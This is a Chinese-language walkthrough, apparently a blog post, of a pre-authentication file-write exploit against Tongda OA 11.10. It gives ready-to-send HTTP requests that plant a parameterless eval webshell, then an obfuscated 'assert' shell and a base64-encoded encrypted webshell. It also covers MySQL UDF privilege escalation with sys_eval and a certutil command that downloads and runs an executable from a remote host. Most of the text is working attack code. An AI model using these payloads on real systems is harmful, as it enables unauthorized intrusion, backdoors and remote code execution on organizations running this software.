通达OA11.10前台getshell执行命令

环境搭建:

https://www.tongda2000.com/download/p2019.php

image-20221025141153587

默认安装位置在 D:\MYOA

image-20221025141244156

搭建完成

image-20221025141321852

直接写入文件,这里我虚拟机安装环境换成了C盘,实际按默认位置D:\MYOA打即可,这里也是写入了test内容

1
/general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22D:\MYOA\webroot\general\test.php%22,%22w%22),%22test%22))%3b/*&id=19&module=Carouselimage

image-20221025141603156

尝试写入一句话,poc无法直接写入带有变量的php语句,在创建的过程中会吃掉变量

image-20221025151408231

解决方法:

第一步先上传无参webshell

1
<?php @eval(next(getallheaders()));
1
2
3
4
5
6
7
8
9
10
GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%e5',1%3d>fwrite(fopen("D:\MYOA\webroot\general\test1.php","w"),"<?php @eval(next(getallheaders()));"))%3b/*&id=19&module=Carouselimage HTTP/1.1
Host: 192.168.121.147:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=7n7nl11mo8hrkp03hvtj8sjti0; KEY_RANDOMDATA=5711
Upgrade-Insecure-Requests: 1

image-20221025142231802

第二步利用无参webshell二次写入

1
2
3
4
5
6
7
8
9
10
11
GET /general/test1.php HTTP/1.1
Host: 192.168.121.147:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: var_dump(file_put_contents('hack.php','<?php $__="assers";++$__;$__($_REQUEST[x]);'));

Upgrade-Insecure-Requests: 1

image-20221025142505565

1
http://192.168.121.147:8081/general/hack.php

image-20221025142919388

但是会发现命令执行不了,无法通过webshell执行命令

image-20221025143000346

如果需要写入比较复杂的webshell,如冰蝎哥斯拉,最好使用base64方法,避免传输过程内容发生改变

1
var_dump(file_put_contents('hack123.php',base64_decode('PD9waHAgQGVycm9yX3JlcG9ydGluZygwKTtzZXNzaW9uX3N0YXJ0KCk7JGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7JF9TRVNTSU9OWydrJ109JGtleTskZj0nZmlsZScuJ19nZXQnLidfY29udGVudHMnOyRwPSd8fHx8fHx8fHx8fCdeY2hyKDEyKS5jaHIoMjApLmNocigxMikuY2hyKDcwKS5jaHIoODMpLmNocig4MykuY2hyKDIxKS5jaHIoMTgpLmNocigxMikuY2hyKDkpLmNocig4KTskSDB3Ujc9JGYoJHApO2lmKCFleHRlbnNpb25fbG9hZGVkKCdvcGVuc3NsJykpeyAkdD1wcmVnX2ZpbHRlcignL1xzKy8nLCcnLCdiYXNlIDY0IF8gZGVjbyBkZScpOyRIMHdSNz0kdCgkSDB3UjcuIiIpO2ZvcigkaT0wOyRpPHN0cmxlbigkSDB3UjcpOyRpKyspIHsgJG5ld19rZXkgPSAka2V5WyRpKzEmMTVdOyRIMHdSN1skaV0gPSAkSDB3UjdbJGldIF4gJG5ld19rZXk7fQl9ZWxzZXsgJEgwd1I3PW9wZW5zc2xfZGVjcnlwdCgkSDB3UjcsICJBRVMxMjgiLCAka2V5KTt9JGFycj1leHBsb2RlKCd8JywkSDB3UjcpOyRmdW5jPSRhcnJbMF07JHBhcmFtcz0kYXJyWzFdO2NsYXNzIEcya2Q2b2hreyBwdWJsaWMgZnVuY3Rpb24gX19pbnZva2UoJHApIHtAZXZhbCgiLypaMVMwUlhCNms2Ki8iLiRwLiIiKTt9fUBjYWxsX3VzZXJfZnVuYy8qWjFTMFJYQjZrNiovKG5ldyBHMmtkNm9oaygpLCRwYXJhbXMpOz8+')));

image-20221028091207318

image-20221028091055284

但是发现一样执行不了命令

image-20221028091238398

默认使用的是mysql数据库,通过 D:\MYOA\mysql5\my.ini 找到密码

image-20221025150306527

使用蚁剑自带的数据库工具进行连接

image-20221025145716640

大部分语句不能执行,于是接下来进行UDF提权

  • 如果版本号大于5.1.4 上传udf的位置应该放在 mysql\lib\plugin目录下
  • 如果版本小于5.1 上传udf的位置应该放在c盘的windows或者windows32目录里

image-20221025152151093

这里大于5.1.4,于是创建lib/plugin文件夹

udf.dll在kali里有编译好的,dll是windows的,so是linux的,选择对应的版本即可

1
/usr/share/metasploit-framework/data/exploits/mysql

image-20221025152044789

image-20221025153104268

SQL执行命令:

1
2
3
create function sys_exec RETURNS int soname 'udf.dll';
create function sys_eval returns string soname 'udf.dll';
select sys_eval("whoami");

成功执行命令:

image-20221025171042502

下载之后文件名会变成MYOAdata51.exe

1
2
select sys_eval("certutil -urlcache -split -f http://x.x.x.x/1 C:\MYOA\data5\1.exe");
select sys_eval("MYOAdata51.exe");

image-20221026012317750